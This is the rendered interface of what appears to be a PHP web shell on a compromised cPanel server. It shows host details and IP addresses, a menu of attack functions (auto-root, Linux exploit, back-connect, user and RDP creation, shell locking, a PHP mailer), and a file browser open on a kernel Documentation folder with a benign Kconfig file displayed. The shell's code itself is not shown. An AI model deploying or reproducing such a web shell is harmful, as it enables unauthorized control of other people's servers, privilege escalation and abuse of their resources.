Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.6.105
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-25 /
Documentation /
[ HOME SHELL ]
Name
Size
Permission
Action
admin-guide
[ DIR ]
drwxr-xr-x
arm64
[ DIR ]
drwxr-xr-x
devicetree
[ DIR ]
drwxr-xr-x
features
[ DIR ]
drwxr-xr-x
kbuild
[ DIR ]
drwxr-xr-x
s390
[ DIR ]
drwxr-xr-x
sound
[ DIR ]
drwxr-xr-x
sphinx
[ DIR ]
drwxr-xr-x
trace
[ DIR ]
drwxr-xr-x
userspace-api
[ DIR ]
drwxr-xr-x
Kconfig
789
B
-rw-r--r--
Makefile
5.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Kconfig
config WARN_MISSING_DOCUMENTS bool "Warn if there's a missing documentation file" depends on COMPILE_TEST help It is not uncommon that a document gets renamed. This option makes the Kernel to check for missing dependencies, warning when something is missing. Works only if the Kernel is built from a git tree. If unsure, select 'N'. config WARN_ABI_ERRORS bool "Warn if there are errors at ABI files" depends on COMPILE_TEST help The files under Documentation/ABI should follow what's described at Documentation/ABI/README. Yet, as they're manually written, it would be possible that some of those files would have errors that would break them for being parsed by scripts/get_abi.pl. Add a check to verify them. If unsure, select 'N'.
Close